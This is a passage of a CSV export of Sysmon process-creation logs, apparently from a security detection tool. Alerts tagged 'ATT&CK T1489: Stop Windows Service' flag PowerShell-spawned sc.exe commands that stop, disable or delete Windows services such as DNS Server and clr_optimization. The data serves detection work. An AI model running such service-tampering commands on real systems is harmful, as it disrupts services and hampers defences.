-s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.201718100Z"",""eventRecordID"":""3261"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.189\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010be812b00}\r\nProcessId: 7840\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.189"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010be812b00}"",""processId"":""7840"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""DNS Server\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:00.001",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.100 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-001067802b00} +ProcessId: 800 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ""DNS Server"" Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \""DNS Server\"" Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.113416100Z"",""eventRecordID"":""3260"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.100\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-001067802b00}\r\nProcessId: 800\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \""DNS Server\"" Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.100"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-001067802b00}"",""processId"":""800"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\""DNS Server\\\"" Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.961",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.025 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010867e2b00} +ProcessId: 880 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Zational +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Zational",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.036116100Z"",""eventRecordID"":""3258"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.025\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010867e2b00}\r\nProcessId: 880\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Zational\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.025"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010867e2b00}"",""processId"":""880"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Zational"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.894",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:31.878 +ProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010767b2b00} +ProcessId: 7660 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:31.883414300Z"",""eventRecordID"":""3255"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:31.878\r\nProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010767b2b00}\r\nProcessId: 7660\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:31.878"",""processGuid"":""{df9fc3d3-b3d3-5ecf-0000-0010767b2b00}"",""processId"":""7660"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.851",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:31.716 +ProcessGuid: {df9fc3d3-b3d3-5ecf-0000-00105c792b00} +ProcessId: 4716 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete clr_optimization +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete clr_optimization",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:31.716163400Z"",""eventRecordID"":""3253"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:31.716\r\nProcessGuid: {df9fc3d3-b3d3-5ecf-0000-00105c792b00}\r\nProcessId: 4716\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete clr_optimization\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:31.716"",""processGuid"":""{df9fc3d3-b3d3-5ecf-0000-00105c792b00}"",""processId"":""4716"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete clr_optimization"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.828",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:31.679 +ProcessGuid: {df9fc3d3-b3d3-5ecf-0000-00106c782b00} +ProcessId: 8088 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop clr_optimization +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:31.689380500Z"",""eventRecordID"":""3252"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:31.679\r\nProcessGuid: {df9fc3d3-b3d3-5ecf-0000-00106c782b00}\r\nProcessId: 8088\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:31.679"",""processGuid"":""{df9fc3d3-b3d3-5ecf-0000-00106c782b00}"",""processId"":""8088"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop clr_optimization"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.793",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:31.330 +ProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010d3722b00} +ProcessId: 984 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop aspnet_staters +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:31.346497100Z"",""eventRecordID"":""3249"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:31.330\r\nProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010d3722b00}\r\nProcessId: 984\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 